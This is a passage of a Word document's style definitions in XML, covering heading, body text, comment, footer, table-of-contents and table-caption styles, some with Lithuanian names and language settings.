      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="000F39FE"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>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rsid w:val="000262D2"/>
    <w:pPr>
      <w:keepNext/>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0262D2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:before="40"/>
      <w:ind w:left="1008" w:hanging="1008"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:color w:val="365F91"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:before="40"/>
      <w:ind w:left="1152" w:hanging="1152"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:color w:val="243F60"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:before="40"/>
      <w:ind w:left="1296" w:hanging="1296"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="243F60"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:before="40"/>
      <w:ind w:left="1440" w:hanging="1440"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:color w:val="272727"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:before="40"/>
      <w:ind w:left="1584" w:hanging="1584"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>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9960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unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00807C1C"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndent3Char">
    <w:name w:val="Body Text Indent 3 Char"/>
    <w:link w:val="BodyTextIndent3"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00807C1C"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00807C1C"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00807C1C"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0010251C"/>
    <w:rPr>
      <w:color w:val="006400"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00C57D06"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="st">
    <w:name w:val="st"/>
    <w:qFormat/>
    <w:rsid w:val="00C57D06"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001972B4"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="longtext">
    <w:name w:val="long_text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00CF037C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00D7484D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama">
    <w:name w:val="Diagrama"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FF31B8"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ISTATYMAS">
    <w:name w:val="ISTATYMAS"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00FF31B8"/>
    <w:pPr>
      <w:keepLines/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="288" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="007144B0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="007144B0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyText3Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="001E3D48"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText3Char">
    <w:name w:val="Body Text 3 Char"/>
    <w:link w:val="BodyText3"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="001E3D48"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FB4B00"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="bodytext">
    <w:name w:val="bodytext"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00FB4B00"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="istatymas0">
    <w:name w:val="istatymas"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00FB4B00"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009C0847"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009C0847"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="009C0847"/>
    <w:rPr>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009C0847"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="009C0847"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:qFormat/>
    <w:rsid w:val="00C951C9"/>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qFormat/>
    <w:rsid w:val="00327C69"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4819"/>
        <w:tab w:val="right" w:pos="9638"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00327C69"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C12EEE"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A3779B"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndentChar">
    <w:name w:val="Body Text Indent Char"/>
    <w:link w:val="BodyTextIndent"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A3779B"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="006F3474"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002D59EF"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="A4">
    <w:name w:val="A4"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00ED3025"/>
    <w:rPr>
      <w:rFonts w:cs="Myriad Pro Light"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="000F39FE"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Times New Roman" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="004C2A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qFormat/>
    <w:rsid w:val="004C2AC0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0055348F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyText2Char"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009A543B"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="480" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText2Char">
    <w:name w:val="Body Text 2 Char"/>
    <w:link w:val="BodyText2"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="009A543B"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ircho">
    <w:name w:val="irc_ho"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="0068042F"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListParagraph1">
    <w:name w:val="List Paragraph1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00AA454E"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000000"/>
      <w:lang w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:aliases w:val="Antrinis pavadinimas"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="00482D2F"/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:aliases w:val="Įprastasis (tinklapis)"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="NormalWebChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CE5AEE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention1">
    <w:name w:val="Unresolved Mention1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0014567F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Lentelespavad">
    <w:name w:val="Lenteles pavad"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="LentelespavadChar"/>
    <w:autoRedefine/>
    <w:rsid w:val="003A3B61"/>
    <w:pPr>
      <w:spacing w:after="40"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="LentelespavadChar">
    <w:name w:val="Lenteles pavad Char"/>
    <w:link w:val="Lentelespavad"/>
    <w:rsid w:val="003A3B61"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="001951D8"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="001951D8"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Times New Roman" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:color w:val="365F91"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:color w:val="243F60"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="243F60"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:color w:val="272727"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NormalWebChar">
    <w:name w:val="Normal (Web) Char"/>
